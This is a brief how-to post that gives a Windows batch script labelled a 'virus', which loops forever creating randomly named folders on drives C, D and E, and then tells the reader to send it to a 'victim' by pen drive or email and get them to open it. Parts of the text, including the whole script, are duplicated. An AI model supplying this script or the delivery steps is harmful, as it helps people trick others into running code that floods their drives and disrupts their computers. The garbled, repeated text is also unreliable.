How to create a simple virus
[ Note : Do not try this on your own Computer ]
STEP 1: OPEN NOTEPAD AND COPY THE FOLLOWING CODE IN NOTEPAD.
Open your notepad from [Start >>
Run >> Type “Notepad” >>PressEnter ]
Run >> Type “Notepad” >>PressEnter ]
Copy the Following Code and paste it in notepad then Save it as “virus.bat”. [you can also save with different name but extension must be .bat]
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
STEP 2: SEND IT TO VICTIM.
Now Give this file to Victim via Pen-drive or Mail then ask to Open it.It will Create More Folder in C, D, and E drive.